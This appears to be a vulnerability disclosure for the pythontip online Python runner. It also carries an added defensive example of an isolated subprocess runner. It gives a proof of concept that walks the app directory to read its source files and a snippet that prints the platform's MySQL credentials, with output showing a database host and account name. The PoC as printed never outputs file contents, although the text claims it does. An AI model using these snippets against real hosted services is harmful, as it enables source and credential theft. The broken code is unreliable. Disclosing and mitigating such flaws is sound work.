In pythontip's online execution you can obtain the program's source code and its configuration. The online programming feature does not block many functions in the os module, nor does it prevent open from reading file contents, which leads to source code leakage; it also does not run the submitted code in an isolated python process, so the sae module can be used to read the program's configuration. Vulnerability proof: run the following at http://pythontip.sinaapp.com/coding/run:
import os

def get_filepaths(directory):
    file_paths = []  # List which will store all of the full filepaths.
    # Walk the tree.
    for root, directories, files in os.walk(directory):
        for filename in files:
            # Join the two strings in order to form the full filepath.
            filepath = os.path.join(root, filename)
            file_paths.append(filepath)  # Add it to the list.
    return file_paths  # Self-explanatory.

for p in get_filepaths("."):
    if p[-2:] == "py":
        f = open(p)
        print "=========[" + p + "]========="
        f.close()
        del f
This outputs the content of every python script in the current directory. Part of the screenshot is as follows:
=========[./manage.py]=========
#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pythontip.settings")

    from django.core.management import execute_from_command_line
(remainder omitted) Then run again:
import sae

print sae.const.MYSQL_USER
print sae.const.MYSQL_PASS
print sae.const.MYSQL_HOST
print sae.const.MYSQL_DB
print sae.const.MYSQL_PORT
Output (evidently the database connection details; although SAE blocks external connections to the database, it may still be possible to read the database from within the online programming environment):
y0k0xwjnljwlw2jmzklz5i122j12i2zj3i34j33z2x3mhii4wyw.rdc.sae.sina.com.cn
app_yunmei3307
Solution: Pythontip has in fact blocked some function execution (for example, execlp in os is not available, and neither is fork). We recommend strengthening the protection and using virtualization technology to run the submitted python programs.
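The following is an added example, written for this page by the editor and not pythontip's or SAE's code, of the process-level separation the solution asks for. It contrasts the weak setting (the submission runs in the web app's own working directory and environment, so os.walk(".") sees the app's sources) with a corrected runner that starts a fresh interpreter in isolated mode inside an empty scratch directory, with a minimal environment, no inherited stdin and CPU/memory limits. The names run_in_app_dir, run_isolated and compare_runners, the SUBMISSION snippet (a Python 3 version of the walk in the PoC above) and the fake manage.py/pythontip/settings.py layout are all assumptions constructed for the example.

```python
import os
import subprocess
import sys
import tempfile

try:
    import resource  # POSIX only; used to cap CPU time and memory in the child
except ImportError:
    resource = None

# Constructed submission, modelled on the PoC above but in Python 3 syntax:
# it counts the .py files reachable from the interpreter's working directory.
SUBMISSION = r'''
import os
found = []
for root, dirs, files in os.walk("."):
    for name in files:
        if name.endswith(".py"):
            found.append(os.path.join(root, name))
print(len(found))
'''


def _limit_child_resources():
    """Runs in the child just before exec: cap CPU seconds and address space."""
    if resource is None:
        return
    for kind, limit in ((resource.RLIMIT_CPU, 2),
                        (resource.RLIMIT_AS, 512 * 1024 * 1024)):
        try:
            resource.setrlimit(kind, (limit, limit))
        except (ValueError, OSError):
            pass  # a limit the platform rejects must not abort the run


def _run(code, cwd, env, isolated, timeout=10.0):
    """Execute `code` in a child interpreter and return its result as a dict."""
    argv = [sys.executable] + (["-I"] if isolated else []) + ["-c", code]
    try:
        proc = subprocess.run(
            argv, cwd=cwd, env=env, stdin=subprocess.DEVNULL,
            capture_output=True, text=True, timeout=timeout,
            preexec_fn=_limit_child_resources if os.name == "posix" else None,
        )
    except subprocess.TimeoutExpired:
        return {"stdout": "", "stderr": "timed out", "returncode": None}
    return {"stdout": proc.stdout, "stderr": proc.stderr,
            "returncode": proc.returncode}


def run_in_app_dir(code, app_dir):
    """Weak setting: same working directory and environment as the web app."""
    return _run(code, cwd=app_dir, env=dict(os.environ), isolated=False)


def run_isolated(code):
    """Corrected setting: isolated-mode interpreter (-I: cwd not on sys.path,
    PYTHON* variables ignored) in an empty scratch directory with a minimal
    environment and resource limits."""
    with tempfile.TemporaryDirectory() as scratch:
        env = {"PATH": "/usr/bin:/bin", "PYTHONDONTWRITEBYTECODE": "1"}
        return _run(code, cwd=scratch, env=env, isolated=True)


def _make_fake_app(root):
    """Constructed stand-in for the leaked layout: manage.py plus a settings module."""
    os.makedirs(os.path.join(root, "pythontip"))
    with open(os.path.join(root, "manage.py"), "w") as fh:
        fh.write("# constructed placeholder\n")
    with open(os.path.join(root, "pythontip", "settings.py"), "w") as fh:
        fh.write("SECRET = 'constructed placeholder'\n")


def compare_runners():
    """Return (.py files seen from the app directory, .py files seen when isolated)."""
    with tempfile.TemporaryDirectory() as app_dir:
        _make_fake_app(app_dir)
        weak = run_in_app_dir(SUBMISSION, app_dir)
        safe = run_isolated(SUBMISSION)
    return int(weak["stdout"].strip()), int(safe["stdout"].strip())


if __name__ == "__main__":
    seen_weak, seen_isolated = compare_runners()
    print("app dir run sees %d .py files, isolated run sees %d"
          % (seen_weak, seen_isolated))
```

The scratch directory and the stripped environment are what stop the walk above from reaching manage.py and the settings module, and a runner interpreter that simply does not have the sae package installed removes the second leak. This is only the first layer, though: the child can still read any world-readable file elsewhere on the host and still has network access, which is why the recommendation above to run submissions under virtualization (a VM or container with its own filesystem and network policy) remains the right endpoint rather than a longer blocklist of os functions.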